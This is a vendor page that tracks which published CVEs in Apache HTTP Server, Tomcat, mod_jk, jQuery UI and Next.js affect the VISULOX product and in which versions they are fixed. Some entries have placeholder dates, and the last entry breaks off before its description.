Skip to main content
Skip table of contents

Security Vulnerabilities

Date   Next Update  

React2Shell (CVE-2025-55182)

VISULOX is not affected by CVE-2025-55182

Apache HTTP

Publish date

CVSS Score

CVE

Component

Description

VLX affected

fixed in 

2023-10-19

low

CVE-2023-31122

mod_macro 

mod_macro buffer over-read
Out-of-bounds Read vulnerability in mod_macro of Apache HTTP Server.This issue affects Apache HTTP Server: through 2.4.57.

not affected

2023-09-15

low

CVE-2023-43622

Apache HTTP Server: DoS in HTTP/2 with initial windows size 0 
An attacker, opening a HTTP/2 connection with an initial window size of 0, was able to block handling of that connection indefinitely in Apache HTTP Server. This could be used to exhaust worker resources in the server, similar to the well known "slow loris" attack pattern.
This has been fixed in version 2.4.58, so that such connection are terminated properly after the configured connection timeout.
This issue affects Apache HTTP Server: from 2.4.55 through 2.4.57.

up to version 4.0.1

4.1.0

2023-10-12

moderate

CVE-2023-45802

Apache HTTP Server: HTTP/2 stream memory not reclaimed right away on RST
When a HTTP/2 stream was reset (RST frame) by a client, there was a time window were the request's memory resources were not reclaimed immediately. Instead, de-allocation was deferred to connection close. A client could send new requests and resets, keeping the connection busy and open and causing the memory footprint to keep on growing. On connection close, all resources were reclaimed, but the process might run out of memory before that.
This was found by the reporter during testing of CVE-2023-44487 (HTTP/2 Rapid Reset Exploit) with their own test client. During "normal" HTTP/2 use, the probability to hit this bug is very low. The kept memory would not become noticeable before the connection closes or times out.

up to version 4.0.1

4.1.0

2023-06-26

moderate

CVE-2023-38709

Apache HTTP Server: HTTP response splitting
Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses.
This issue affects Apache HTTP Server: through 2.4.58.

up to version 4.0.1

4.1.0

2023-09-06

low

CVE-2024-24795

Apache HTTP Server: HTTP Response Splitting in multiple modules
HTTP Response splitting in multiple modules in Apache HTTP Server allows an attacker that can inject malicious response headers into backend applications to cause an HTTP desynchronization attack.
Users are recommended to upgrade to version 2.4.59, which fixes this issue.

up to version 4.0.1

4.1.0

2024-02-22

moderate

CVE-2024-27316

Apache HTTP Server: HTTP/2 DoS by memory exhaustion on endless continuation frames
HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.

up to version 4.0.1

4.1.0

2024-04-01

low

CVE-2024-36387

Apache HTTP Server: DoS by Null pointer in websocket over HTTP/2
Serving WebSocket protocol upgrades over a HTTP/2 connection could result in a Null Pointer dereference, leading to a crash of the server process, degrading performance.

up to version 4.0.1

4.1.0

2024-04-01

important

CVE-2024-38472

Apache HTTP Server on WIndows UNC SSRF
SSRF in Apache HTTP Server on Windows allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests or content

not affected

2024-04-01

moderate

CVE-2024-38473

mod_proxy

Apache HTTP Server proxy encoding problem
Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.

up to version 4.0.1

4.1.0

2024-04-01

important

CVE-2024-38474

Apache HTTP Server weakness with encoded question marks in backreferences
Substitution encoding issue in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows attacker to execute scripts in
directories permitted by the configuration but not directly reachable by any URL or source disclosure of scripts meant to only to be executed as CGI.

up to version 4.0.1

4.1.0

2024-04-01

important

CVE-2024-38475

mod_rewrite

Apache HTTP Server weakness in mod_rewrite when first segment of substitution matches filesystem path
Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure.
Substitutions in server context that use a backreferences or variables as the first segment of the substitution are affected. Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.

up to version 4.0.1

4.1.0

2024-04-01

important

CVE-2024-38476

Apache HTTP Server may use exploitable/malicious backend application output to run local handlers via internal redirect
Vulnerability in core of Apache HTTP Server 2.4.59 and earlier are vulnerably to information disclosure, SSRF or local script execution via backend applications whose response headers are malicious or exploitable.

up to version 4.0.1

4.1.0

2024-04-01

important

CVE-2024-38477

mod_proxy

Apache HTTP Server: Crash resulting in Denial of Service in mod_proxy via a malicious request
null pointer dereference in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows an attacker to crash the server via a malicious request.

up to version 4.0.1

4.1.0

2024-04-01

important

CVE-2024-39573

mod_rewrite

Apache HTTP Server: mod_rewrite proxy handler substitution
Potential SSRF in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to cause unsafe RewriteRules to unexpectedly setup URL's to be handled by mod_proxy.

up to version 4.0.1

4.1.0

2024-07-01

important

CVE-2024-39884

A regression in the core of Apache HTTP Server 2.4.60 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted.

up to version 4.0.1

4.1.0

2024-07-09

important

CVE-2024-40725

A partial fix for CVE-2024-39884 in the core of Apache HTTP Server 2.4.61 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted.

up to version 4.1.0

4.1.1

2024-07-12

important

CVE-2024-40898

mod_rewrite

SSRF in Apache HTTP Server on Windows with mod_rewrite in server/vhost context, allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests.

up to version 4.1.0

4.1.1

2025-07-10

moderate

CVE-2024-42516

HTTP response splitting in the core of Apache HTTP Server allows an attacker who can manipulate the Content-Type response headers of applications hosted or proxied by the server can split the HTTP response.

This vulnerability was described as CVE-2023-38709 but the patch included in Apache HTTP Server 2.4.59 did not address the issue.

Users are recommended to upgrade to version 2.4.64, which fixes this issue.

up to version 4.3.0

4.3.1

2025-07-10

low

CVE-2024-43204

mod_headers,
mod_proxy

SSRF in Apache HTTP Server with mod_proxy loaded allows an attacker to send outbound proxy requests to a URL controlled by the attacker. Requires an unlikely configuration where mod_headers is configured to modify the Content-Type request or response header with a value provided in the HTTP request.

Users are recommended to upgrade to version 2.4.64 which fixes this issue.

not affected

2025-07-10

moderate

CVE-2024-43394

Server-Side Request Forgery (SSRF) in Apache HTTP Server on Windows allows to potentially leak NTLM hashes to a malicious server via

mod_rewrite or apache expressions that pass unvalidated request input.

This issue affects Apache HTTP Server: from 2.4.0 through 2.4.63.

Note: The Apache HTTP Server Project will be setting a higher bar for accepting vulnerability reports regarding SSRF via UNC paths.

The server offers limited protection against administrators directing the server to open UNC paths.

Windows servers should limit the hosts they will connect over via SMB based on the nature of NTLM authentication.

not affected

2025-07-10

low

CVE-2024-47252

mod_ssl

Insufficient escaping of user-supplied data in mod_ssl in Apache HTTP Server 2.4.63 and earlier allows an untrusted SSL/TLS client to insert escape characters into log files in some configurations.

In a logging configuration where CustomLog is used with "%{varname}x" or "%{varname}c" to log variables provided by mod_ssl such as SSL_TLS_SNI, no escaping is performed by either mod_log_config or mod_ssl and unsanitized data provided by the client may appear in log files.

not affected

2025-07-10

moderate

CVE-2025-23048

In some mod_ssl configurations on Apache HTTP Server 2.4.35 through to 2.4.62, an access control bypass by trusted clients is possible using TLS 1.3 session resumption.

Configurations are affected when mod_ssl is configured for multiple virtual hosts, with each restricted to a different set of trusted client certificates (for example with a different SSLCACertificateFile/Path setting). In such a case, a client trusted to access one virtual host may be able to access another virtual host, if SSLStrictSNIVHostCheck is not enabled in either virtual host.

not investigated

4.3.1

2025-07-10

low

CVE-2025-49630

In certain proxy configurations, a denial of service attack against Apache HTTP Server versions 2.4.26 through to 2.4.63 can be triggered by untrusted clients causing an assertion in mod_proxy_http2.

Configurations affected are a reverse proxy is configured for an HTTP/2 backend, with ProxyPreserveHost set to "on".

not affected

2025-07-10

moderate

CVE-2025-49812

In some mod_ssl configurations on Apache HTTP Server versions through to 2.4.63, an HTTP desynchronisation attack allows a man-in-the-middle attacker to hijack an HTTP session via a TLS upgrade.

Only configurations using "SSLEngine optional" to enable TLS upgrades are affected. Users are recommended to upgrade to version 2.4.64, which removes support for TLS upgrade.

not affected

2025-07-10

moderate

CVE-2025-53020

Late Release of Memory after Effective Lifetime vulnerability in Apache HTTP Server.

This issue affects Apache HTTP Server: from 2.4.17 up to 2.4.63.

Users are recommended to upgrade to version 2.4.64, which fixes the issue.

not investigated

4.3.1

2025-07-16

moderate

CVE-2025-54090

Apache HTTP Server: 'RewriteCond expr' always evaluates to true in 2.4.64
HTTP response splitting in the core of Apache HTTP Server allows an attacker who can manipulate the Content-Type response headers of applications hosted or proxied by the server can split the HTTP response.

This vulnerability was described as CVE-2023-38709 but the patch included in Apache HTTP Server 2.4.59 did not address the issue.

Users are recommended to upgrade to version 2.4.64, which fixes this issue.

not investigated

4.3.1

2025-11-19

moderate

CVE-2025-66200

Apache HTTP Server: mod_userdir+suexec bypass via AllowOverride FileInfo
mod_userdir+suexec bypass via AllowOverride FileInfo vulnerability in Apache HTTP Server. Users with access to use the RequestHeader directive in htaccess can cause some CGI scripts to run under an unexpected userid.
This issue affects Apache HTTP Server: from 2.4.7 through 2.4.65.

Users are recommended to upgrade to version 2.4.66, which fixes the issue.

not affected

2025-11-14

low

CVE-2025-65082

Apache HTTP Server: CGI environment variable override
Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache HTTP Server through environment variables set via the Apache configuration unexpectedly superseding variables calculated by the server for CGI programs.

This issue affects Apache HTTP Server from 2.4.0 through 2.4.65.

Users are recommended to upgrade to version 2.4.66 which fixes the issue.

not investigated

4.3.2

2025-09-10

moderate

CVE-2025-59775

Apache HTTP Server: NTLM Leakage on Windows through UNC SSRF
Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server on Windows

with AllowEncodedSlashes On and MergeSlashes Off  allows to potentially leak NTLM

hashes to a malicious server via SSRF and malicious requests or content

Users are recommended to upgrade to version 2.4.66, which fixes the issue.

not affected

2025-08-21

moderate

CVE-2025-58098

Server Side Includes adds query string to #exec cmd=...
Apache HTTP Server 2.4.65 and earlier with Server Side Includes (SSI) enabled and mod_cgid (but not mod_cgi) passes the shell-escaped query string to #exec cmd="..." directives.

This issue affects Apache HTTP Server before 2.4.66.

Users are recommended to upgrade to version 2.4.66, which fixes the issue.

not affected

2025-08-15

low

CVE-2025-55753

mod_md (ACME), unintended retry intervals
An integer overflow in the case of failed ACME certificate renewal leads, after a number of failures (~30 days in default configurations), to the backoff timer becoming 0. Attempts to renew the certificate then are repeated without delays until it succeeds.

This issue affects Apache HTTP Server: from 2.4.30 before 2.4.66.

Users are recommended to upgrade to version 2.4.66, which fixes the issue.

not affected

Apache Tomcat

Publish date

CVSS Score

CVE

Description

VLX affected

fixed in

2023-08-22

moderate

CVE-2023-41080

Open redirect
If the ROOT (default) web application is configured to use FORM authentication then it is possible that a specially crafted URL could be used to trigger a redirect to an URL of the attackers choice.

not affected

2023-10-10

important

CVE-2023-45648

Request smuggling
Tomcat did not correctly parse HTTP trailer headers. A specially crafted, invalid trailer header could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.

not affected

2023-10-10

important

CVE-2023-44487

Denial of Service
Tomcat's HTTP/2 implementation was vulnerable to the rapid reset attack. The denial of service typically manifested as an OutOfMemoryError.

not affected

2023-10-10

important

CVE-2023-42795

Information Disclosure
When recycling various internal objects, including the request and the response, prior to re-use by the next request/response, an error could cause Tomcat to skip some parts of the recycling process leading to information leaking from the current request/response to the next.

up to version 4.0.1

4.1.0

2023-10-10

low

CVE-2023-42794

Denial of Service
Tomcat's internal fork of a Commons FileUpload included an unreleased, in progress refactoring that exposed a potential denial of service on Windows if a web application opened a stream for an uploaded file but failed to close the stream. The file would never be deleted from disk creating the possibility of an eventual denial of service due to the disk being full.

not affected

2023-11-28

important

CVE-2023-46589

Request smuggling
Tomcat did not correctly parse HTTP trailer headers. A specially crafted trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.

not affected

2024-03-13

important

CVE-2024-23672

Denial of Service
It was possible for a WebSocket client to keep a WebSocket connection open leading to increased resource consumption.

not affected

2024-03-13

important

CVE-2024-24549

Denial of Service
When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.

not affected

2024-07-03

important

CVE-2024-34750

Denial of Service

When processing an HTTP/2 stream, Tomcat did not handle some cases of excessive HTTP headers correctly. This led to a miscounting of active HTTP/2 streams which in turn led to the use of an incorrect infinite timeout which allowed connections to remain open which should have been closed.

not affected

2024-09-23

important

CVE-2024-38286

Tomcat, under certain configurations on any platform, allows an attacker to cause an OutOfMemoryError by abusing the TLS handshake process.

This was fixed with commit 76c5cce6.

This issue was reported to the Tomcat Security Team on 4 June 2024. The issue was made public on 23 September 2024. Affects: 9.0.13 to 9.0.89

not affected

2024-11-18

low

CVE-2024-52316

Authentication Bypass

If Tomcat was configured to use a custom Jakarta Authentication (formerly JASPIC) ServerAuthContext component which may throw an exception during the authentication process without explicitly setting an HTTP status to indicate failure, the authentication may not have failed, allowing the user to bypass the authentication process. There are no known Jakarta Authentication components that behave in this way.

This was fixed with commit 7532f9dc.

This issue was identified by the Tomcat Security Team on 19 September 2024. The issue was made public on 18 November 2024.

Affects: 9.0.0-M1 to 9.9.95

not affected

2024-11-18

important

CVE-2024-52317

Request and/or response mix-up

Incorrect recycling of the request and response used by HTTP/2 requests could lead to request and/or response mix-up between users.

This was fixed with commit 47307ee2.

This issue was identified by the Tomcat Security Team on 1 October 2024. The issue was made public on 18 November 2024.

Affects: 9.0.92 to 9.0.95

not affected

2024-11-18

important

CVE-2024-52318

XSS in generated JSPs

The fix for improvement 69333 caused pooled JSP tags not to be released after use which in turn could cause output of some tags not to escaped as expected. This unescaped output could lead to XSS.

This was fixed with commit 9813c5dd.

The issue was made public on 18 November 2024.

Affects: 9.0.96

not affected

2024-12-17

low

CVE-2024-54677

DoS in examples web application

Numerous examples in the examples web application did not place limits on uploaded data enabling an OutOfMemoryError to be triggered causing a denial of service.

This was fixed with commits 1d88dd3f, 721544ea, 84065e26, 3315a902, c2f7ce21, 75ff7e86, 4d5cc653, 84c4af76 and 9ffd23fc.

The issue was made public on 17 December 2024.

Affects: 9.0.0.M1 to 9.0.97

not affected

2024-12-20

important

CVE-2024-56337

Remote Code Execution via write enabled Default Servlet. Mitigation for CVE-2024-50379 was incomplete

The previous mitigation for CVE-2024-50379 was incomplete. In addition to upgrading to 9.0.98 or later, users running Tomcat on a case insensitive file system with the default servlet write enabled may need additional configuration depending on the version of Java being used:

  • running on Java 8 or Java 11: the system property sun.io.useCanonCaches must be explicitly set to false (it defaults to true)

  • running on Java 17: the system property sun.io.useCanonCaches, if set, must be set to false (it defaults to false)

  • running on Java 21 onwards: no further configuration is required (the system property and the problematic cache have been removed)

 

The issue was made public on 20 December 2024.

Affects: 9.0.0.M1 to 9.0.97

not affected

2024-12-17

important

CVE-2024-50379

Remote Code Execution via write enabled Default Servlet

If the default servlet is write enabled (readonly initialisation parameter set to the non-default value of false) for a case insensitive file system, concurrent read and upload under load of the same file can bypass Tomcat's case sensitivity checks and cause an uploaded file to be treated as a JSP leading to remote code execution.

This was fixed with commits 43b507eb and 631500b0.

The issue was made public on 17 December 2024.

Affects: 9.0.0.M1 to 9.0.97

not affected

2025-02-10

important

CVE-2025-24813

Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet

The original implementation of partial PUT used a temporary file based on the user provided file name and path with the path separator replaced by ".".

If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files:

  • writes enabled for the default servlet (disabled by default)

  • support for partial PUT (enabled by default)

  • a target URL for security sensitive uploads that is a sub-directory of a target URL for public uploads

  • attacker knowledge of the names of security sensitive files being uploaded

  • the security sensitive files also being uploaded via partial PUT

If all of the following were true, a malicious user was able to perform remote code execution:

  • writes enabled for the default servlet (disabled by default)

  • support for partial PUT (enabled by default)

  • application was using Tomcat's file based session persistence with the default storage location

  • application included a library that may be leveraged in a deserialization attack

This was fixed with commit eb61aade.

The issue was made public on 10 March 2025.

Affects: 9.0.0.M1 to 9.0.98

not affected

2025-04-08

low

CVE-2025-31651

Rewrite rule bypass

For a subset of unlikely rewrite rule configurations, it was possible for a specially crafted request to bypass some rewrite rules. If those rewrite rules effectively enforced security constraints, those constraints could be bypassed.

This was fixed with commits ee3ab548 and 175dc75f.

The issue was made public on 28 April 2025.

Affects: 9.0.0.M1 to 9.0.102

not affected

2025-04-08

important

CVE-2025-31650

Denial of Service via invalid HTTP priority header

Incorrect error handling for some invalid HTTP priority headers resulted in incomplete clean-up of the failed request which created a memory leak. A large number of such requests could trigger an OutOfMemoryException resulting in a denial of service.

This was fixed with commits 40ae788c, b98e74f5 and b7674782.

The issue was made public on 28 April 2025.

Affects: 9.0.76 to 9.0.102

not affected

2025-05-12

low

CVE-2025-46701

Low: CGI security constraint bypass

When running on a case insensitive file system with security constraints configured for the pathInfo component of a URL that mapped to the CGI servlet, it was possible to bypass those security constraints with a specially crafted URL.

This was fixed with commits 8df00018 and 8cb95ff0.

The issue was made public on 29 May 2025.

Affects: 9.0.0.M1 to 9.0.104

not affected

2025-05-29

important

CVE-2025-48976

DoS in Commons FileUpload

Apache Commons FileUpload provided a hard-coded limit of 10kB for the size of the headers associated with a multipart request. A specially crafted request that used a large number of parts with large headers could trigger excessive memory usage leading to a DoS. This limit is now configurable (maxPartHeaderSize on the Connector) with a default of 512 bytes.

This was fixed with commit 97790a35.

The issue was made public on 16 June 2025.

not affected

2025-06-16

important

CVE-2025-48988

DoS in multipart upload

Tomcat used the same limit for both request parameters and parts in a multipart request. Since uploaded parts also include headers which must be retained, processing multipart requests can result in significantly more memory usage. A specially crafted request that used a large number of parts could trigger excessive memory usage leading to a DoS. The maximum number of parts is now configurable (maxPartCount on the Connector) with a default of 10 parts.

This was fixed with commit ee8042ff.

The issue was made public on 16 June 2025.

Affects: 9.0.0.M1 to 9.0.105

not investigated

4.3.1

2025-06-16

low

CVE-2025-49124

Side-loading via Tomcat installer for Windows

During installation, the Tomcat installer for Windows used icacls.exe without specifying a full path. This enabled a side-loading vulnerability.

This was fixed with commit 28726cc2.

The issue was made public on 16 June 2025.

Affects: 9.0.23 to 9.0.105

not affected

2025-06-16

moderate

CVE-2025-49125

Security constraint bypass for PreResources and PostResources

When using PreResources or PostResources mounted other than at the root of the web application, it was possible to access those resources via an unexpected path. That path was likely not to be protected by the same security constraints as the expected path, allowing those security constraints to be bypassed.

This was fixed with commit 9418e3ff.

The issue was made public on 16 June 2025.

Affects: 9.0.0.M1 to 9.0.105

not affected

2025-07-xx

important

CVE-2025-53506

DoS via excessive HTTP/2 streams

This was fixed with commit 43477293.

The issue was made public on XXX July 2025.

Affects: 9.0.0.M1 to 9.0.106

not affected

2025-07-xx

low

CVE-2025-52520

DoS due to overflow in file upload limit

This was fixed with commit 927d66fb.

The issue was made public on XXX July 2025.

Affects: 9.0.0.M1 to 9.0.106

not investigated

4.3.1

2025-07-xx

important

CVE-2025-52434

Dos with HTTP/2 and APR/Native

This was fixed with commit 8a83c3c4.

The issue was made public on XXX July 2025.

Affects: 9.0.0.M1 to 9.0.106

not affected

2025-08-13

important

CVE-2025-48989

DoS in HTTP/2 due to client triggered stream reset
Tomcat's HTTP/2 implementation was vulnerable to the made you reset attack. The denial of service typically manifested as an OutOfMemoryError.

This was fixed with commit f36b8a4e.

The issue was made public on 13 August 2025.

Affects: 9.0.0.M1 to 9.0.107

not affected

2025-10-27

low

CVE-2025-55754

Console manipulation via escape sequences in log messages
Tomcat did not escape ANSI escape sequences in log messages. If Tomcat was running in a console on a Windows operating system, and the console supported ANSI escape sequences, it was possible for an attacker to use a specially crafted URL to inject ANSI escape sequences to manipulate the console and the clipboard and attempt to trick an administrator into running an attacker controlled command. While no attack vector was found, it may have been possible to mount this attack on other operating systems.

This was fixed with commit a03cabf3.

This issue was reported to the Tomcat security team on 5 August 2025. The issue was made public on 27 October 2025.

Affects: 9.0.40 to 9.0.108

not affected

2025-10-27

important

CVE-2025-55752

Directory traversal via Rewrite Valve with possible remote code execution if PUT is enabled
The fix for bug 60013 introduced a regression where the rewritten URL was normalized before it was decoded. This introduced the possibility that, for rewrite rules that rewrite query parameters to the URL, an attacker could manipulate the request URI to bypass security constraints including the protection for /WEB-INF/ and /META-INF/. If PUT requests were also enabled then malicious files could be uploaded leading to remote code execution. PUT requests are normally limited to trusted users and it is considered unlikely that PUT requests would be enabled in conjunction with a rewrite that manipulated the URI.

This was fixed with commit b5042622.

This issue was reported to the Tomcat security team on 11 August 2025. The issue was made public on 27 October 2025.

Affects: 9.0.0.M11 to 9.0.108

not affected

2025-10-27

low

CVE-2025-61795

Delayed cleaning of multipart upload temporary files may lead to DoS
If an error occurred (including exceeding limits) during the processing of a multipart upload, temporary copies of the uploaded parts written to local storage were not cleaned up immediately but left for the garbage collection process to delete. Depending on JVM settings, application memory usage and application load, it was possible that space for the temporary copies of uploaded parts would be filled faster than GC cleared it, leading to a DoS.

This was fixed with commit afa422bd.

This issue was reported to the Tomcat security team on 7 September 2025. The issue was made public on 27 October 2025.

Affects: 9.0.0.M1 to 9.0.109

up to version 4.3.1

4.3.2

2026-01-23

Moderate

CVE-2026-24734

Incomplete OCSP verification checks
When using an OCSP responder, Tomcat's FFM integration with OpenSSL did not complete verification or freshness checks on the OCSP response which could allow certificate revocation to be bypassed.

Affects: 9.0.83 to 9.0.114

not affected

2025-12-07

low

CVE-2026-24733

Security constraint bypass
Tomcat did not limit HTTP/0.9 requests to the GET method. If a security constraint was configured to allow HEAD requests to a URI but deny GET requests, the user could bypass that constraint on GET requests by sending a (specification invalid) HEAD request using HTTP/0.9.

This was fixed with commit 2e2fa23f.

This issue was identified by the Tomcat security team on 26 November 2025. The issue was made public on 17 February 2026.

Affects: 9.0.0.M1 to 9.0.112

not affected

2025-12-07

Moderate

CVE-2025-66614

Client certificate verification bypass due to virtual host mapping
Tomcat did not validate that the host name provided via the SNI extension was the same as the host name provided in the HTTP host header field. If Tomcat was configured with more than one virtual host and the TLS configuration for one of those hosts did not require client certificate authentication but another one did, it was possible for a client to bypass the client certificate authentication by sending different host names in the SNI extension and the HTTP host header field.

The vulnerability only applies if client certificate authentication is only enforced at the Connector. It does not apply if client certificate authentication is enforced at the web application.

This was fixed with commits 152c1488, a4aa7423 and 9276b5e7.

This issue was reported to the Tomcat security team on 15 October 2025. The issue was made public on 17 February 2026.

Affects: 9.0.0.M1 to 9.0.112

not affected

2026-04-03

Moderate

CVE-2026-34500

OCSP checks sometimes soft-fail with FFM even when soft-fail is disabled
CLIENT_CERT authentication does not fail as expected for some scenarios when soft fail is disabled and FFM is used.

This was fixed with commit ff589ab2.

This issue was reported to the Tomcat security team on 25 March 2026. The issue was made public on 9 April 2026.

Affects: 9.0.92 to 9.0.116

under investigation

2026-04-03

low

CVE-2026-34487

Cloud membership for clustering component exposed the Kubernetes bearer token
The cloud membership for clustering component exposed the Kubernetes bearer token in log messages.

This was fixed with commit f593292a.

This issue was reported to the Tomcat security team on 25 March 2026. The issue was made public on 9 April 2026.

Affects: 9.0.13 to 9.0.116

under investigation

2026-04-03

Important

CVE-2026-34486

The fix for CVE-2026-29146 allowed the bypass of the EncryptInterceptor
An error in the fix for CVE-2026-29146 allowed the EncryptInterceptor to be bypassed.

This was fixed with commit 776e12b3.

This issue was reported to the Tomcat security team on 26 March 2026. The issue was made public on 9 April 2026.

Affects: 9.0.116

under investigation

2026-04-03

low

CVE-2026-34483

Incomplete escaping of JSON access logs
Incomplete escaping when non-default values were used for the Connector attributes relaxedPathChars and/or relaxedQueryChars allowed the injection of arbitrary JSON into the JSON access log.

This was fixed with commit 97566842.

This issue was reported to the Tomcat security team on 25 March 2026. The issue was made public on 9 April 2026.

Affects: 9.0.40 to 9.0.116

under investigation

2026-03-20

Moderate

CVE-2026-32990

The fix for CVE-2025-66614 was incomplete
The validation of SNI name and host name did not take account of possible differences in case allowing the strict SNI checks to be bypassed.

This was fixed with commit 95f77782.

This issue was reported to the Tomcat security team on 13 March 2026. The issue was made public on 9 April 2026.

Affects: 9.0.113 to 9.0.115

not affected

2026-03-20

Important

CVE-2026-29146

EncryptInterceptor vulnerable to padding oracle attack by default
The EncryptInterceptor used CBC by default which is vulnerable to a padding Oracle attack.

This was fixed with commit 0112ed22.

This issue was reported to the Tomcat security team on 22 February 2026. The issue was made public on 9 April 2026.

Affects: 9.0.13 to 9.0.115

under investigation

2026-03-20

Moderate

CVE-2026-29145

OCSP checks sometimes soft-fail even when soft-fail is disabled
CLIENT_CERT authentication did not fail OCSP checks as expected for some scenarios when soft fail was disabled.

This was fixed with commit d1406df5.

This issue was reported to the Tomcat security team on 26 February 2026. The issue was made public on 9 April 2026.

under investigation

2026-03-20

low

CVE-2026-29129

Configured TLS cipher preference order not preserved
The additional of the ability to configure TLS 1.3 cipher suites did not preserve the order of the configured cipher suites and ciphers.

This was fixed with commit 6db23856.

This was reported as a bug on 20 February 026 and the security implications identified by the Tomcat security team the same day. The issue was made public on 9 April 2026.

Affects: 9.0.114 to 9.0.115

under investigation

2026-03-20

low

CVE-2026-25854

Occasionally open redirect
When a Tomcat node in a cluster with the LoadBalancerDrainingValve was in the disabled (draining) state, a specially crafted URL could be used to trigger a redirect to a URI of the attackers choice.

This was fixed with commit c5a45ae6.

This issue was reported to the Tomcat security team on 30 January 2026. The issue was made public on 9 April 2026.

Affects: 9.0.0.M23 to 9.0.115

under investigation

2026-03-20

low

CVE-2026-24880

Request smuggling via invalid chunk extension
Tomcat did not validate that contents of HTTP/1.1 chunk extensions. This enabled a request smuggling attack if a reverse proxy in front of Tomcat allowed CRLF sequences in an otherwise valid chunk extension.

This was fixed with commits 1b586d6a and 6d478dbe.

This issue was reported to the Tomcat security team on 19 January 2026. The issue was made public on 9 April 2026.

Affects: 9.0.0.M1 to 9.0.115

under investigation

Apache Tomcat JK Connector

Publish date

CVSS Score

CVE

Description

VLX affected

fixed in

2023-09-13

important

CVE-2023-41081

Information disclosure
In some circumstances, such as when a configuration included JkOptions +ForwardDirectories but the configuration did not provide explicit mounts for all possible proxied requests, mod_jk would use an implicit mapping and map the request to the first defined worker. Such an implicit mapping could result in the unintended exposure of the status worker and/or bypass security constraints configured in httpd. As of JK 1.2.49, the implicit mapping functionality has been removed and all mappings must now be via explicit configuration. Only mod_jk is affected by this issue. The ISAPI redirector is not affected.

up to version 4.0.1

4.1.0

2024-09-23

moderate

CVE-2024-46544

Incorrect default permissions for the memory mapped file configured by the JkShmFile directive on Unix like systems allows local users to view and/or modify the contents of the shared memory containing mod_jk configuration and status information. This could result in information disclosure and/or denial of service.

This was fixed with commit d55706e9.

This issue was identified by the Tomcat Security Team on 6 August 2024. The issue was made public on 23 September 2024.

up to version 4.1.1

attack vector is low and only from local vector

4.2.0

Jquery

Publish date

CVSS Score

CVE

Description

VLX affected

fixed in

Version 3.7.1 - no known vulnerabilities

JqueryUI

Publish date

CVSS Score

CVE

Description

VLX affected

fixed in

2022-07-20

CVE-2022-31160

 jQuery UI is a curated set of user interface interactions, effects, widgets, and themes built on top of jQuery. Versions prior to 1.13.2 are potentially vulnerable to cross-site scripting. Initializing a checkboxradio widget on an input enclosed within a label makes that parent label contents considered as the input label. Calling `.checkboxradio( "refresh" )` on such a widget and the initial HTML contained encoded HTML entities will make them erroneously get decoded. This can lead to potentially executing JavaScript code. The bug has been patched in jQuery UI 1.13.2

up to version 4.0.1

4.1.0

next.js

Publish date

CVSS Score

CVE

Description

VLX affected

fixed in

2024-05-09

High 7.5

CVE-2024-34351

 Next.js is a React framework that can provide building blocks to create web applications. A Server-Side Request Forgery (SSRF) vulnerability was identified in Next.js Server Actions. If the `Host` header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself. The required conditions are 1) Next.js is running in a self-hosted manner; 2) the Next.js application makes use of Server Actions; and 3) the Server Action performs a redirect to a relative path which starts with a `/`. This vulnerability was fixed in Next.js `14.1.1`.

not affected

 2024-05-09

High 7.5

CVE-2024-34350

Next.js is a React framework that can provide building blocks to create web applications. Prior to 13.5.1, an inconsistent interpretation of a crafted HTTP request meant that requests are treated as both a single request, and two separate requests by Next.js, leading to desynchronized responses. This led to a response queue poisoning vulnerability in the affected Next.js versions. For a request to be exploitable, the affected route also had to be making use of the [rewrites](https://nextjs.org/docs/app/api-reference/next-config-js/rewrites ) feature in Next.js. The vulnerability is resolved in Next.js `13.5.1` and newer.

not affected

2024-07-10

High 7.5

CVE-2024-39693

Next.js is a React framework. A Denial of Service (DoS) condition was identified in Next.js. Exploitation of the bug can trigger a crash, affecting the availability of the server. his vulnerability was resolved in Next.js 13.5 and later.

not affected

2024-09-17

High 7.5

CVE-2024-46982

Next.js is a React framework for building full-stack web applications. By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. To be potentially affected all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using pages router, & 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not. There are no official or recommended workarounds for this issue, we recommend that users patch to a safe version.

not affected

2024-10-14

High 7.5

CVE-2024-47831

